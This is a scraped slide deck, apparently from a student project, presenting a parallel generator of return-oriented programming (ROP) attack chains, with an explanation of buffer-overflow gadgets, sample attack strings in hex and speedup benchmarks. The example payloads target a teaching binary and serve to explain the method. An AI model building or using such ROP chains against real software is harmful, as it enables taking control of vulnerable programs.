propaganda
play

PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler - PowerPoint PPT Presentation

PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler Chris Lee and Ben Spinelli A return-oriented programming (ROP) attack takes advantage of buffer overflow vulnerabilities in executables to gain control of the program. Stack


  1. PROPAGANDA Parallel ROP Attack Generator and Non-Direct Assembler Chris Lee and Ben Spinelli

  2. A return-oriented programming (ROP) attack takes advantage of buffer overflow vulnerabilities in executables to gain control of the program. Stack ... buf ... ret ... Attack String 00 00 00 00 &G1 &G2 ... Padding (fills buffer) Your addresses clobber the return address Because programs are just sequences of bytes, you could directly input byte code in old school attacks. BUT , people fixed this, so now we use GADGETS!

  3. Gadgets are sequences of bytes within the vulnerable executable that are terminated by 0xc3 (return). After returning, the program goes to the next return address and continues executing. 402e74: 41 5f pop %r15 402e76: c3 retq 5f c3 performs pop %rdi (register used for first argument). So, we just have to create a string like this: /* pop %rdi */ 75 2e 40 00 00 00 00 00 PROFIT! /* stack constant $0xffff */ ff ff 00 00 00 00 00 00 /* address of withdraw_money */ 23 1e 60 00 00 00 00 00

  4. We created a parallel ROP attack generator. We perform parallel search based on a sequence of desired effects (target) and equivalence rules. Both are provided by the user. Equivalence S  t t  D S + $0x0  D t  D rules: S  D S  D We grow a tree by applying the given rules and creating variables ( t ). A node can be: • matched with a gadget: becomes a solved leaf. • matched with a rule: creates more nodes and solves them. We do this until every endpoint is a solved leaf.

  5. This is the result of a completed search. Target: Attack String: %rsp + $0x1337  %rdi /* Pad with buffer size */ /* Mov %rdx, %rax */ 00 00 00 00 00 00 00 00 0f 1c 40 00 00 00 00 00 Gadgets: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 /* Mov %rcx, %rdx */ 00 00 00 00 00 00 00 00 08 1c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 %rsp  %rax (0x401c4f) /* Mov %rsi, %rcx */ 00 00 00 00 00 00 00 00 %rcx  %rsi (0x401c2f) 2f 1c 40 00 00 00 00 00 %rax  %rdx /* Mov %rax, %rsp */ (0x401c0f) 4f 1c 40 00 00 00 00 00 /* Arith %rax, %rdi+%rsi */ %rdx  %rcx (0x401c08) 98 1b 40 00 00 00 00 00 %rcx  %rdx (0x401bb8) /* Mov %rdi, %rax */ 6c 1b 40 00 00 00 00 00 %rdi + %rsi  %rax (0x401b98) /* Call target function */ 01 23 45 67 89 ab cd ef pop %rax (0x401b98) /* Load %rax, $0x1337 */ %rax  %rdi (0x401b6c) 8d 1b 40 00 00 00 00 00 /* Stack constant 0x1337 */ 37 13 00 00 00 00 00 00 Complete Tree (grows upwards): %rdi + %rsi  %rax %rax  %rdi %rcx  %rsi t2 + t5  t6 t6  %rdi %rdx  %rcx t4  t5 t2 + t5  %rdi %rax  %rdx t3  t4 t2 + t4  %rdi pop %rax ($0x1337) %rax  %rdx t1  t3 t2 + t3  %rdi %rsp  %rax pop t1 ($0x1337) t0  t2 t2 + t1  %rdi %rsp  t0 $0x1337  t1 t0 + t1  %rdi %rsp + $0x1337  %rdi

  6. Our algorithm was difficult to implement because of domain-imposed constraints: 1. Preventing Infinite looping  How do we prevent a cycle of applied rules? 2. Synchronizing Variables  When a variable gets a value, how do we update that value across all branches that have it?  And then back track if that value fails? 3. Serializing gadgets  All instructions share a small number of registers.  How do we prevent them from clobbering each other’s resources? We solved these problems. Check our writeup for details. :D

  7. We parallelized our algorithm by distributing work before the search occurs. Running on Original Target 2 threads Chunk 0 Chunk 2 Chunk 3 Chunk 1 T0 T1 Global Work Queue We wanted to minimize synchronization between threads. Chunk 2 Chunk 3 We did implement parallelism with much finer-grained work distribution, but…. Cost of synchronization > Benefit of fine-grained work distribution

  8. Speedup is limited by attack target size. Typical targets aren’t heavily imbalanced, so our work distribution is OK. Run on 6-core GHC Machine Large target [GHC38] Medium target Small target

  9. Workload imbalance is the main barrier to parallelism. We have to assign nodes to threads before knowing how much each node will need. Run on 6-core GHC Machine [GHC38]

  10. Short-circuiting on failure can result in super-linear speedup. Note: In this case, we get a 50x speedup, but this just depends on the disparity of the branch sizes. Run on 6-core GHC Machine One branch [GHC38] fails earlier All branches failed at around the same time

  11. LIVE DEMO!!!! ✧ ۹ (• ́ ⌄ • ́ ๑ ) و ✧

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend